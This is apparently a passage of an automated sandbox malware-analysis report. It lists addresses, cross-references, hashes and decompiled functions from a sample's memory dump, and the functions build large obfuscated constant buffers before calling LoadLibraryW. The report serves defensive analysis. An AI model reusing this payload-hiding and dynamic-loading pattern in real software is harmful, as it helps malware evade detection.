0x02d69588
0x02d69592
0x02d6959c
0x02d695a6
0x02d695b0
0x02d695ba
0x02d695c4
0x02d695ce
0x02d695d8
0x02d695e2
0x02d695ec
0x02d695f6
0x02d69600
0x02d6960a
0x02d69614
0x02d6961e
0x02d69628
0x02d69632
0x02d6963c
0x02d69646
0x02d69650
0x02d6965a
0x02d69664
0x02d6966e
0x02d69678
0x02d69682
0x02d6968c
0x02d69696
0x02d696a0
0x02d696aa
0x02d696b4
0x02d696be
0x02d696c8
0x02d696d2
0x02d696dc
0x02d696e6
0x02d696f0
0x02d696fa
0x02d69704
0x02d6970e
0x02d69718
0x02d69722
0x02d6972c
0x02d69736
0x02d69740
0x02d6974a
0x02d69754
0x02d6975e
0x02d69768
0x02d69772
0x02d6977c
0x02d69786
0x02d69790
0x02d6979a
0x02d697a4
0x02d697ae
0x02d697b8
0x02d697c2
0x02d697cc
0x02d697d6
0x02d697e0
0x02d697ea
0x02d697f4
0x02d697fe
0x02d69808
0x02d69812
0x02d6981c
0x02d69826
0x02d69830
0x02d6983a
0x02d69844
0x02d6984e
0x02d69858
0x02d69862
0x02d6986c
0x02d69876
0x02d69880
0x02d6988a
0x02d69894
0x02d6989e
0x02d698a8
0x02d698b2
0x02d698bc
0x02d698c6
0x02d698d0
0x02d698da
0x02d698e4
0x02d698ee
0x02d698f8
0x02d69902
0x02d6990c
0x02d69916
0x02d69920
0x02d6992a
0x02d69934
0x02d6993e
0x02d69948
0x02d69952
0x02d6995c
0x02d69966
0x02d69970
0x02d6997a
0x02d69984
0x02d6998e
0x02d69998
0x02d699a2
0x02d699ac
0x02d699b6
0x02d699c0
0x02d699ca
0x02d699d4
0x02d699de
0x02d699e8
0x02d699f2
0x02d699fc
0x02d69a06
0x02d69a10
0x02d69a1a
0x02d69a24
0x02d69a2e
0x02d69a38
0x02d69a42
0x02d69a4c
0x02d69a56
0x02d69a60
0x02d69a6a
0x02d69a74
0x02d69a7e
0x02d69a88
0x02d69a92
0x02d69a9c
0x02d69aa6
0x02d69ab0
0x02d69aba
0x02d69ac4
0x02d69ace
0x02d69ad8
0x02d69ae2
0x02d69ae9
0x02d69af0
0x02d69af7
0x02d69afe
0x02d69b05
0x02d69b0c
0x02d69b13
0x02d69b1a
0x02d69b21
0x02d69b28
0x02d69b2f
0x02d69b36
0x02d69b3d
0x02d69b44
0x02d69b4b
0x02d69b52
0x02d69b59
0x02d69b60
0x02d69b67
0x02d69b6e
0x02d69b75
0x02d69b7c
0x02d69b83
0x02d69b8a
0x02d69b91
0x02d69b98
0x02d69b9f
0x02d69ba6
0x02d69bad
0x02d69bb4
0x02d69bbe
0x02d69bca
0x02d69bd9
0x02d69be4
0x02d69be9
0x02d69c15

APIs

LoadLibraryW.KERNEL32(00000000), ref: 02D69BDC

Strings

=WB, xrefs: 02D69B67
Jg, xrefs: 02D696B4
,M[, xrefs: 02D694FC
0E_, xrefs: 02D69452
[aY<, xrefs: 02D69B13
z9, xrefs: 02D6954C
OI5, xrefs: 02D69BCA
XX, xrefs: 02D699F2
h , xrefs: 02D69A06
?/&9, xrefs: 02D69858
7cn@, xrefs: 02D69A56

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ,M[$0E_$7cn@$?/&9$OI5$[aY<$h $=WB$Jg$XX$z9
API String ID: 1029625771-656464786
Opcode ID: e059e2d874df9d2e1647d48c8b1d403ee0e233058760cc74445a9e64b1d230f3
Instruction ID: 43683b3b991779b8a2a889c08c4a67f64ffd4aa2c9bb095993aa6688ef5d1846
Opcode Fuzzy Hash: e059e2d874df9d2e1647d48c8b1d403ee0e233058760cc74445a9e64b1d230f3
Instruction Fuzzy Hash: 0212C5B4C563A98BEB61DF829A897CDBB74BB01304F6096C8D15D3B214CB750B86CF85

Uniqueness

Uniqueness Score: -1.00%

Function 02D6C4A2, Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 188
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E02D6C4A2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t172;
				void* _t182;

				_t172 = __ebx;
				 *((intOrPtr*)(_t182 - 0x298)) = 0x52459e17;
				 *((intOrPtr*)(_t182 - 0x294)) = 0x86d386ca;
				 *((intOrPtr*)(_t182 - 0x290)) = 0x7399ebb2;
				 *((intOrPtr*)(_t182 - 0x28c)) = 0x952a5076;
				 *((intOrPtr*)(_t182 - 0x288)) = 0xcd9f87fb;
				 *((intOrPtr*)(_t182 - 0x284)) = 0x3b68407;
				 *((intOrPtr*)(_t182 - 0x280)) = 0x2b0b54ea;
				 *((intOrPtr*)(_t182 - 0x27c)) = 0x87af31fe;
				 *((intOrPtr*)(_t182 - 0x278)) = 0x32d3b2aa;
				 *((intOrPtr*)(_t182 - 0x274)) = 0xd53c4ad0;
				 *((intOrPtr*)(_t182 - 0x270)) = 0x1badd01b;
				 *((intOrPtr*)(_t182 - 0x26c)) = 0x5ca56928;
				 *((intOrPtr*)(_t182 - 0x268)) = 0x9c8e4613;
				 *((intOrPtr*)(_t182 - 0x264)) = 0xe5302044;
				 *((intOrPtr*)(_t182 - 0x260)) = 0x5940d0b6;
				 *((intOrPtr*)(_t182 - 0x25c)) = 0x297a4302;
				 *((intOrPtr*)(_t182 - 0x258)) = 0x73bc18b3;
				 *((intOrPtr*)(_t182 - 0x254)) = 0xfbaf1987;
				 *((intOrPtr*)(_t182 - 0x250)) = 0x213c960f;
				 *((intOrPtr*)(_t182 - 0x24c)) = 0xb9bf1577;
				 *((intOrPtr*)(_t182 - 0x248)) = 0xaab93976;
				 *((intOrPtr*)(_t182 - 0x244)) = 0xee7db1b9;
				 *((intOrPtr*)(_t182 - 0x240)) = 0x1572761c;
				 *((intOrPtr*)(_t182 - 0x23c)) = 0x59cd89c5;
				 *((intOrPtr*)(_t182 - 0x238)) = 0x7ada791b;
				 *((intOrPtr*)(_t182 - 0x234)) = 0x67ea1a56;
				 *((intOrPtr*)(_t182 - 0x230)) = 0xa9d1aaa8;
				 *((intOrPtr*)(_t182 - 0x22c)) = 0x32f177e6;
				 *((intOrPtr*)(_t182 - 0x228)) = 0x9156ed80;
				 *((intOrPtr*)(_t182 - 0x224)) = 0x9d7f5a33;
				 *((intOrPtr*)(_t182 - 0x220)) = 0x63d53a8b;
				 *((intOrPtr*)(_t182 - 0x21c)) = 0xeb2d7b79;
				 *((intOrPtr*)(_t182 - 0x218)) = 0x523c6852;
				 *((intOrPtr*)(_t182 - 0x214)) = 0xbee9a20;
				 *((intOrPtr*)(_t182 - 0x210)) = 0x898c0b5f;
				 *((intOrPtr*)(_t182 - 0x20c)) = 0x133ae6d4;
				 *((intOrPtr*)(_t182 - 0x208)) = 0x30bab8ce;
				 *((intOrPtr*)(_t182 - 0x204)) = 0x9dd4ad8b;
				 *((intOrPtr*)(_t182 - 0x200)) = 0xca86968e;
				 *((intOrPtr*)(_t182 - 0x1fc)) = 0x37c02118;
				 *((intOrPtr*)(_t182 - 0x1f8)) = 0x616c6eae;
				 *((intOrPtr*)(_t182 - 0x1f4)) = 0x1c303d5a;
				 *((intOrPtr*)(_t182 - 0x1f0)) = 0x285a95f;
				 *((intOrPtr*)(_t182 - 0x1ec)) = 0xb13e4962;
				 *((intOrPtr*)(_t182 - 0x1e8)) = 0x7463d38;
				 *((intOrPtr*)(_t182 - 0x1e4)) = 0x65a7c387;
				 *((intOrPtr*)(_t182 - 0x1e0)) = 0x120384ca;
				 *((intOrPtr*)(_t182 - 0x1dc)) = 0x7b578e1a;
				 *((intOrPtr*)(_t182 - 0x1d8)) = 0xa08fbe4e;
				 *((intOrPtr*)(_t182 - 0x1d4)) = 0xf0cba0be;
				 *((intOrPtr*)(_t182 - 0x1d0)) = 0x1dbb148;
				 *((intOrPtr*)(_t182 - 0x1cc)) = 0x89472a31;
				 *((intOrPtr*)(_t182 - 0x1c8)) = 0xd9822949;
				 *((intOrPtr*)(_t182 - 0x1c4)) = 0xe56019;
				 *((intOrPtr*)(_t182 - 0x1c0)) = 0x25c2f49b;
				 *((intOrPtr*)(_t182 - 0x1bc)) = 0x5cd0f997;
				 *((intOrPtr*)(_t182 - 0x1b8)) = 0x78a4ba9e;
				 *((intOrPtr*)(_t182 - 0x1b4)) = 0x1733feff;
				 *((intOrPtr*)(_t182 - 0x1b0)) = 0xf6437fb0;
				 *((intOrPtr*)(_t182 - 0x1ac)) = 0x84dc4db;
				 *((intOrPtr*)(_t182 - 0x1a8)) = 0x50f3c249;
				 *((intOrPtr*)(_t182 - 0x1a4)) = 0x338bbc6b;
				 *((intOrPtr*)(_t182 - 0x1a0)) = 0xfda8c573;
				 *((intOrPtr*)(_t182 - 0x19c)) = 0x68b274ed;
				 *((intOrPtr*)(_t182 - 0x198)) = 0x5e4e4bf4;
				 *((intOrPtr*)(_t182 - 0x194)) = 0x5ade75ee;
				 *((intOrPtr*)(_t182 - 0x190)) = 0xfe16afcb;
				 *((intOrPtr*)(_t182 - 0x18c)) = 0xe99002;
				 *((intOrPtr*)(_t182 - 0x188)) = 0x3b15a4df;
				 *((intOrPtr*)(_t182 - 0x184)) = 0x72b00854;
				 *((intOrPtr*)(_t182 - 0x180)) = 0xe4f63257;
				 *((intOrPtr*)(_t182 - 0x17c)) = 0xd75e1742;
				 *((intOrPtr*)(_t182 - 0x178)) = 0x2d2a2507;
				 *((intOrPtr*)(_t182 - 0x174)) = 0xa3fc5cdd;
				 *((intOrPtr*)(_t182 - 0x170)) = 0xed7ce9c;
				 *((intOrPtr*)(_t182 - 0x16c)) = 0x3a829126;
				 *((intOrPtr*)(_t182 - 0x168)) = 0xc3ceeb83;
				 *((intOrPtr*)(_t182 - 0x164)) = 0x30d64745;
				 *((intOrPtr*)(_t182 - 0x160)) = 0x45186189;
				 *((intOrPtr*)(_t182 - 0x15c)) = 0x21c68a6f;
				 *((intOrPtr*)(_t182 - 0x158)) = 0xea2e0845;
				 *((intOrPtr*)(_t182 - 0x154)) = 0xb18d95b7;
				 *((intOrPtr*)(_t182 - 0x150)) = 0xbf3559c9;
				 *((intOrPtr*)(_t182 - 0x14c)) = 0x1c4d330e;
				 *((intOrPtr*)(_t182 - 0x148)) = 0xd2ed7bdc;
				 *((intOrPtr*)(_t182 - 0x144)) = 0x7a88ba1;
				 *((intOrPtr*)(_t182 - 0x140)) = 0x8e681557;
				 *((intOrPtr*)(_t182 - 0x13c)) = 0x8e21e904;
				 *((intOrPtr*)(_t182 - 0x138)) = 0xadefa415;
				 *((intOrPtr*)(_t182 - 0x134)) = 0xf849fe16;
				 *((intOrPtr*)(_t182 - 0x130)) = 0xaeb06c7f;
				 *((intOrPtr*)(_t182 - 0x12c)) = 0xbce1536a;
				 *((intOrPtr*)(_t182 - 0x128)) = 0x8e426346;
				 *((intOrPtr*)(_t182 - 0x124)) = 0x65d2bcb8;
				 *((intOrPtr*)(_t182 - 0x120)) = 0xff38eb8f;
				 *((intOrPtr*)(_t182 - 0x11c)) = 0xfc2d68ac;
				 *((intOrPtr*)(_t182 - 0x118)) = 0x6df160ad;
				 *((intOrPtr*)(_t182 - 0x114)) = 0xaf6c7fed;
				 *((intOrPtr*)(_t182 - 0x110)) = 0x973dcba0;
				 *((intOrPtr*)(_t182 - 0x10c)) = 0x607f95bf;
				 *((intOrPtr*)(_t182 - 0x108)) = 0xf79ff104;
				 *((intOrPtr*)(_t182 - 0x104)) = 0x5ff1325c;
				 *((intOrPtr*)(_t182 - 0x100)) = 0x92990405;
				 *((intOrPtr*)(_t182 - 0xfc)) = 0xef5a7122;
				 *((intOrPtr*)(_t182 - 0xf8)) = 0xf67f884c;
				 *((intOrPtr*)(_t182 - 0xf4)) = 0x5f05446;
				 *((intOrPtr*)(_t182 - 0xf0)) = 0x4b3d8e6c;
				 *((intOrPtr*)(_t182 - 0xec)) = 0x933f8d6;
				 *((intOrPtr*)(_t182 - 0xe8)) = 0x57c10841;
				 *((intOrPtr*)(_t182 - 0xe4)) = 0xb5a03f8;
				 *((intOrPtr*)(_t182 - 0xe0)) = 0x46fbc152;
				 *((intOrPtr*)(_t182 - 0xdc)) = 0x91e3002b;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t182 - 0xd8)) = 0x3cd185e9;
				 *((intOrPtr*)(_t182 - 0xd4)) = 0x4f6e3982;
				 *((intOrPtr*)(_t182 - 0xd0)) = 0x8007072a;
				 *((intOrPtr*)(_t182 - 0xcc)) = 0xf6ae852f;
				 *((intOrPtr*)(_t182 - 0xc8)) = 0xd9e069d6;
				 *((intOrPtr*)(_t182 - 0xc4)) = 0x50ed7135;
				 *((intOrPtr*)(_t182 - 0xc0)) = 0xf11af6c3;
				 *((intOrPtr*)(_t182 - 0xbc)) = 0xcfaa9a11;
				 *((intOrPtr*)(_t182 - 0xb8)) = 0x3c0388f5;
				 *((intOrPtr*)(_t182 - 0xb4)) = 0x29a2147e;
				 *((intOrPtr*)(_t182 - 0xb0)) = 0xec8c36ec;
				 *((intOrPtr*)(_t182 - 0xac)) = 0xd37f0f51;
				 *((intOrPtr*)(_t182 - 0xa8)) = 0x7102390c;
				 *((intOrPtr*)(_t182 - 0xa4)) = 0xd11229b4;
				 *((intOrPtr*)(_t182 - 0xa0)) = 0xe4a90d0c;
				 *((intOrPtr*)(_t182 - 0x9c)) = 0xa15fc107;
				 *((intOrPtr*)(_t182 - 0x98)) = 0x9477c33;
				 *((intOrPtr*)(_t182 - 0x94)) = 0xeefea971;
				 *((intOrPtr*)(_t182 - 0x90)) = 0x7375348d;
				 *((intOrPtr*)(_t182 - 0x8c)) = 0xb4acef68;
				 *((intOrPtr*)(_t182 - 0x88)) = 0x5d5a45a9;
				 *((intOrPtr*)(_t182 - 0x84)) = 0x5bbc8ce5;
				 *((intOrPtr*)(_t182 - 0x80)) = 0xbe7f5968;
				 *((intOrPtr*)(_t182 - 0x7c)) = 0x4d4ea15e;
				 *((intOrPtr*)(_t182 - 0x78)) = 0x59d61505;
				 *((intOrPtr*)(_t182 - 0x74)) = 0x1beb8dd7;
				 *((intOrPtr*)(_t182 - 0x70)) = 0x4c77ffe8;
				 *((intOrPtr*)(_t182 - 0x6c)) = 0xf4ccfc85;
				 *((intOrPtr*)(_t182 - 0x68)) = 0x9b21eee8;
				 *((intOrPtr*)(_t182 - 0x64)) = 0x2d3e3818;
				 *((intOrPtr*)(_t182 - 0x60)) = 0x4f205279;
				 *((intOrPtr*)(_t182 - 0x5c)) = 0xda6700a;
				 *((intOrPtr*)(_t182 - 0x58)) = 0x423d7a3f;
				 *((intOrPtr*)(_t182 - 0x54)) = 0x5dd72052;
				 *((intOrPtr*)(_t182 - 0x50)) = 0xd0f5a90b;
				 *((intOrPtr*)(_t182 - 0x4c)) = 0x6c91e15b;
				 *((intOrPtr*)(_t182 - 0x48)) = 0x25d278ad;
				 *((intOrPtr*)(_t182 - 0x44)) = 0x110c2516;
				 *((intOrPtr*)(_t182 - 0x40)) = 0xeff902cc;
				 *((intOrPtr*)(_t182 - 0x3c)) = 0xd92713ce;
				 *((intOrPtr*)(_t182 - 0x38)) = 0xa7f4539a;
				 *((intOrPtr*)(_t182 - 0x34)) = 0x63317bfe;
				 *((intOrPtr*)(_t182 - 0x30)) = 0x429993b4;
				 *((intOrPtr*)(_t182 - 0x2c)) = 0xa65b9958;
				 *((intOrPtr*)(_t182 - 0x28)) = 0x291ea408;
				 *((intOrPtr*)(_t182 - 0x24)) = 0x1dafb85;
				 *((intOrPtr*)(_t182 - 0x20)) = 0x41dd936;
				 *((intOrPtr*)(_t182 - 0x1c)) = 0xb1b06b97;
				 *((intOrPtr*)(_t182 - 0x18)) = 0x44e35222;
				 *((intOrPtr*)(_t182 - 0x14)) = 0xe0257b4d;
				 *((intOrPtr*)(_t182 - 0x10)) = 0x99d0ce2a;
				 *((intOrPtr*)(_t182 - 0xc)) = 0xf2eaa2aa;
				 *((intOrPtr*)(_t182 - 8)) = 0x390167fb;
				 *((intOrPtr*)(_t182 - 4)) = 0x6c900bdb;
				_t180 = L02D61D10(0x2d73050, 0x64, __edi, __esi);
				 *0x2d771f4 = LoadLibraryW(_t168);
				L02D61DB0(_t180);
				return E02D61570(_t172,  *0x2d771f4, _t182 - 0x728, _t180, 0x1ca, 0x703a5795, 0x2d76ab0);
			}

0x02d6c4a2
0x02d6c4a2
0x02d6c4ac
0x02d6c4b6
0x02d6c4c0
0x02d6c4ca
0x02d6c4d4
0x02d6c4de
0x02d6c4e8
0x02d6c4f2
0x02d6c4fc
0x02d6c506
0x02d6c510
0x02d6c51a
0x02d6c524
0x02d6c52e
0x02d6c538
0x02d6c542
0x02d6c54c
0x02d6c556
0x02d6c560
0x02d6c56a
0x02d6c574
0x02d6c57e
0x02d6c588
0x02d6c592
0x02d6c59c
0x02d6c5a6
0x02d6c5b0
0x02d6c5ba
0x02d6c5c4
0x02d6c5ce
0x02d6c5d8
0x02d6c5e2
0x02d6c5ec
0x02d6c5f6
0x02d6c600
0x02d6c60a
0x02d6c614
0x02d6c61e
0x02d6c628
0x02d6c632
0x02d6c63c
0x02d6c646
0x02d6c650
0x02d6c65a
0x02d6c664
0x02d6c66e
0x02d6c678
0x02d6c682
0x02d6c68c
0x02d6c696
0x02d6c6a0
0x02d6c6aa
0x02d6c6b4
0x02d6c6be
0x02d6c6c8
0x02d6c6d2
0x02d6c6dc
0x02d6c6e6
0x02d6c6f0
0x02d6c6fa
0x02d6c704
0x02d6c70e
0x02d6c718
0x02d6c722
0x02d6c72c
0x02d6c736
0x02d6c740
0x02d6c74a
0x02d6c754
0x02d6c75e
0x02d6c768
0x02d6c772
0x02d6c77c
0x02d6c786
0x02d6c790
0x02d6c79a
0x02d6c7a4
0x02d6c7ae
0x02d6c7b8
0x02d6c7c2
0x02d6c7cc
0x02d6c7d6
0x02d6c7e0
0x02d6c7ea
0x02d6c7f4
0x02d6c7fe
0x02d6c808
0x02d6c812
0x02d6c81c
0x02d6c826
0x02d6c830
0x02d6c83a
0x02d6c844
0x02d6c84e
0x02d6c858
0x02d6c862
0x02d6c86c
0x02d6c876
0x02d6c880
0x02d6c88a
0x02d6c894
0x02d6c89e
0x02d6c8a8
0x02d6c8b2
0x02d6c8bc
0x02d6c8c6
0x02d6c8d0
0x02d6c8da
0x02d6c8e4
0x02d6c8ee
0x02d6c8f8
0x02d6c902
0x02d6c90c
0x02d6c91b
0x02d6c925
0x02d6c92f
0x02d6c939
0x02d6c943
0x02d6c94d
0x02d6c957
0x02d6c961
0x02d6c96b
0x02d6c975
0x02d6c97f
0x02d6c989
0x02d6c993
0x02d6c99d
0x02d6c9a7
0x02d6c9b1
0x02d6c9bb
0x02d6c9c5
0x02d6c9cf
0x02d6c9d9
0x02d6c9e3
0x02d6c9ed
0x02d6c9f4
0x02d6c9fb
0x02d6ca02
0x02d6ca09
0x02d6ca10
0x02d6ca17
0x02d6ca1e
0x02d6ca25
0x02d6ca2c
0x02d6ca33
0x02d6ca3a
0x02d6ca41
0x02d6ca48
0x02d6ca4f
0x02d6ca56
0x02d6ca5d
0x02d6ca64
0x02d6ca6b
0x02d6ca72
0x02d6ca79
0x02d6ca80
0x02d6ca87
0x02d6ca8e
0x02d6ca95
0x02d6ca9c
0x02d6caa3
0x02d6caaa
0x02d6cab1
0x02d6cab8
0x02d6cabf
0x02d6cac6
0x02d6cad5
0x02d6cae0
0x02d6cae5
0x02d6cb11

APIs

LoadLibraryW.KERNEL32(00000000), ref: 02D6CAD8

Strings

M{%, xrefs: 02D6CAAA
yR O, xrefs: 02D6CA25
y{-, xrefs: 02D6C5D8
+, xrefs: 02D6C8F8
D 0, xrefs: 02D6C524
3|G, xrefs: 02D6C9B1
?z=B, xrefs: 02D6CA33
5qP, xrefs: 02D6C943
"qZ, xrefs: 02D6C8A8
Rh<R, xrefs: 02D6C5E2
"RD, xrefs: 02D6CAA3

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: "RD$"qZ$+$3|G$5qP$?z=B$D 0$M{%$Rh<R$yR O$y{-
API String ID: 1029625771-2697299831
Opcode ID: ba9057fab6a6e06b549421f89e401d3afa84aa8f6c7b4a34f6876779a9a28974
Instruction ID: 95bd4dcf575b92c2853f4c7c29ca13b610f3f6ff332e3cb1d8729fe4974ffa61
Opcode Fuzzy Hash: ba9057fab6a6e06b549421f89e401d3afa84aa8f6c7b4a34f6876779a9a28974
Instruction Fuzzy Hash: 24E187B48463698BDB60DF829A897DDBB70FB16704F6086C8C19D3B314DB750A86CF85

Uniqueness

Uniqueness Score: -1.00%

Function 02D69C2A, Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 312
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E02D69C2A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t296;
				void* _t306;

				_t296 = __ebx;
				 *((intOrPtr*)(_t306 - 0x488)) = 0x6a4d398f;
				 *((intOrPtr*)(_t306 - 0x484)) = 0x55c9496e;
				 *((intOrPtr*)(_t306 - 0x480)) = 0x85c10421;
				 *((intOrPtr*)(_t306 - 0x47c)) = 0x9320e84e;
				 *((intOrPtr*)(_t306 - 0x478)) = 0x99615d5;
				 *((intOrPtr*)(_t306 - 0x474)) = 0x4eb8d5c7;
				 *((intOrPtr*)(_t306 - 0x470)) = 0x193a4375;
				 *((intOrPtr*)(_t306 - 0x46c)) = 0x6e624913;
				 *((intOrPtr*)(_t306 - 0x468)) = 0x5616a493;
				 *((intOrPtr*)(_t306 - 0x464)) = 0x5f0da257;
				 *((intOrPtr*)(_t306 - 0x460)) = 0x7c43828e;
				 *((intOrPtr*)(_t306 - 0x45c)) = 0x83e69878;
				 *((intOrPtr*)(_t306 - 0x458)) = 0x65452c66;
				 *((intOrPtr*)(_t306 - 0x454)) = 0x40545962;
				 *((intOrPtr*)(_t306 - 0x450)) = 0x501ff0ed;
				 *((intOrPtr*)(_t306 - 0x44c)) = 0xfd17e9c7;
				 *((intOrPtr*)(_t306 - 0x448)) = 0xd89e953b;
				 *((intOrPtr*)(_t306 - 0x444)) = 0x8add80c3;
				 *((intOrPtr*)(_t306 - 0x440)) = 0x70df70f0;
				 *((intOrPtr*)(_t306 - 0x43c)) = 0x9f19943c;
				 *((intOrPtr*)(_t306 - 0x438)) = 0xb8178d91;
				 *((intOrPtr*)(_t306 - 0x434)) = 0x6e3b8fb6;
				 *((intOrPtr*)(_t306 - 0x430)) = 0x3289d0de;
				 *((intOrPtr*)(_t306 - 0x42c)) = 0xb0b8bd2b;
				 *((intOrPtr*)(_t306 - 0x428)) = 0x43fc6a3;
				 *((intOrPtr*)(_t306 - 0x424)) = 0xda4299cc;
				 *((intOrPtr*)(_t306 - 0x420)) = 0x26ab0ef1;
				 *((intOrPtr*)(_t306 - 0x41c)) = 0xf516ec4;
				 *((intOrPtr*)(_t306 - 0x418)) = 0x2b544722;
				 *((intOrPtr*)(_t306 - 0x414)) = 0x123a7ac3;
				 *((intOrPtr*)(_t306 - 0x410)) = 0xa21f517a;
				 *((intOrPtr*)(_t306 - 0x40c)) = 0x44a38e59;
				 *((intOrPtr*)(_t306 - 0x408)) = 0x9e81bf9e;
				 *((intOrPtr*)(_t306 - 0x404)) = 0xb2702bb8;
				 *((intOrPtr*)(_t306 - 0x400)) = 0xa4636a96;
				 *((intOrPtr*)(_t306 - 0x3fc)) = 0x756f16f4;
				 *((intOrPtr*)(_t306 - 0x3f8)) = 0xef965b39;
				 *((intOrPtr*)(_t306 - 0x3f4)) = 0xfa226884;
				 *((intOrPtr*)(_t306 - 0x3f0)) = 0xa40dbf5a;
				 *((intOrPtr*)(_t306 - 0x3ec)) = 0xd46e9a5a;
				 *((intOrPtr*)(_t306 - 0x3e8)) = 0xbf370855;
				 *((intOrPtr*)(_t306 - 0x3e4)) = 0x6344f32c;
				 *((intOrPtr*)(_t306 - 0x3e0)) = 0x3e0d5dd;
				 *((intOrPtr*)(_t306 - 0x3dc)) = 0x1c98b87e;
				 *((intOrPtr*)(_t306 - 0x3d8)) = 0x83a1f915;
				 *((intOrPtr*)(_t306 - 0x3d4)) = 0xb0f90b52;
				 *((intOrPtr*)(_t306 - 0x3d0)) = 0xbc25012d;
				 *((intOrPtr*)(_t306 - 0x3cc)) = 0xdb16c8ea;
				 *((intOrPtr*)(_t306 - 0x3c8)) = 0xbd9c5aa6;
				 *((intOrPtr*)(_t306 - 0x3c4)) = 0x2e88c20;
				 *((intOrPtr*)(_t306 - 0x3c0)) = 0xa3b12f7f;
				 *((intOrPtr*)(_t306 - 0x3bc)) = 0x555b7388;
				 *((intOrPtr*)(_t306 - 0x3b8)) = 0x15e9418a;
				 *((intOrPtr*)(_t306 - 0x3b4)) = 0x8d0a490;
				 *((intOrPtr*)(_t306 - 0x3b0)) = 0xee09c07c;
				 *((intOrPtr*)(_t306 - 0x3ac)) = 0xd2c67d0b;
				 *((intOrPtr*)(_t306 - 0x3a8)) = 0xdded558d;
				 *((intOrPtr*)(_t306 - 0x3a4)) = 0x290b51d2;
				 *((intOrPtr*)(_t306 - 0x3a0)) = 0xb597d190;
				 *((intOrPtr*)(_t306 - 0x39c)) = 0xcc10472e;
				 *((intOrPtr*)(_t306 - 0x398)) = 0x47c66f1;
				 *((intOrPtr*)(_t306 - 0x394)) = 0x6c78c80b;
				 *((intOrPtr*)(_t306 - 0x390)) = 0x524bfa0;
				 *((intOrPtr*)(_t306 - 0x38c)) = 0x9c79039;
				 *((intOrPtr*)(_t306 - 0x388)) = 0x5a990a62;
				 *((intOrPtr*)(_t306 - 0x384)) = 0x57d03df4;
				 *((intOrPtr*)(_t306 - 0x380)) = 0xbe1a0c89;
				 *((intOrPtr*)(_t306 - 0x37c)) = 0x28bdda15;
				 *((intOrPtr*)(_t306 - 0x378)) = 0x56237138;
				 *((intOrPtr*)(_t306 - 0x374)) = 0x5e9d1bcc;
				 *((intOrPtr*)(_t306 - 0x370)) = 0x57a87d95;
				 *((intOrPtr*)(_t306 - 0x36c)) = 0x68caec9f;
				 *((intOrPtr*)(_t306 - 0x368)) = 0x34c45a75;
				 *((intOrPtr*)(_t306 - 0x364)) = 0xd42300d5;
				 *((intOrPtr*)(_t306 - 0x360)) = 0xeb37d20f;
				 *((intOrPtr*)(_t306 - 0x35c)) = 0xfa370ba3;
				 *((intOrPtr*)(_t306 - 0x358)) = 0xe23b3c0e;
				 *((intOrPtr*)(_t306 - 0x354)) = 0x51a38f9a;
				 *((intOrPtr*)(_t306 - 0x350)) = 0x7ff204d7;
				 *((intOrPtr*)(_t306 - 0x34c)) = 0xda447583;
				 *((intOrPtr*)(_t306 - 0x348)) = 0xbefa4e65;
				 *((intOrPtr*)(_t306 - 0x344)) = 0xd1d167a9;
				 *((intOrPtr*)(_t306 - 0x340)) = 0x8834809;
				 *((intOrPtr*)(_t306 - 0x33c)) = 0xde9dcce;
				 *((intOrPtr*)(_t306 - 0x338)) = 0x56147a5;
				 *((intOrPtr*)(_t306 - 0x334)) = 0x99ccd69d;
				 *((intOrPtr*)(_t306 - 0x330)) = 0xe5cb7a11;
				 *((intOrPtr*)(_t306 - 0x32c)) = 0xe90ee76d;
				 *((intOrPtr*)(_t306 - 0x328)) = 0xfc6116e4;
				 *((intOrPtr*)(_t306 - 0x324)) = 0x75d33041;
				 *((intOrPtr*)(_t306 - 0x320)) = 0x717d0669;
				 *((intOrPtr*)(_t306 - 0x31c)) = 0x23a08b51;
				 *((intOrPtr*)(_t306 - 0x318)) = 0xb9008877;
				 *((intOrPtr*)(_t306 - 0x314)) = 0xd099b6a9;
				 *((intOrPtr*)(_t306 - 0x310)) = 0x6cb87068;
				 *((intOrPtr*)(_t306 - 0x30c)) = 0x52dd3a7b;
				 *((intOrPtr*)(_t306 - 0x308)) = 0xb1c4d779;
				 *((intOrPtr*)(_t306 - 0x304)) = 0x24a6249e;
				 *((intOrPtr*)(_t306 - 0x300)) = 0xffac7cfa;
				 *((intOrPtr*)(_t306 - 0x2fc)) = 0xb2778a53;
				 *((intOrPtr*)(_t306 - 0x2f8)) = 0xfc957864;
				 *((intOrPtr*)(_t306 - 0x2f4)) = 0xa41101b8;
				 *((intOrPtr*)(_t306 - 0x2f0)) = 0xe6c581a8;
				 *((intOrPtr*)(_t306 - 0x2ec)) = 0xdecf5441;
				 *((intOrPtr*)(_t306 - 0x2e8)) = 0xb7eb67f3;
				 *((intOrPtr*)(_t306 - 0x2e4)) = 0x733db354;
				 *((intOrPtr*)(_t306 - 0x2e0)) = 0xf233b6ff;
				 *((intOrPtr*)(_t306 - 0x2dc)) = 0x9387f9f9;
				 *((intOrPtr*)(_t306 - 0x2d8)) = 0x39894cb8;
				 *((intOrPtr*)(_t306 - 0x2d4)) = 0xd6bccbbc;
				 *((intOrPtr*)(_t306 - 0x2d0)) = 0xbd383b2c;
				 *((intOrPtr*)(_t306 - 0x2cc)) = 0x3a729915;
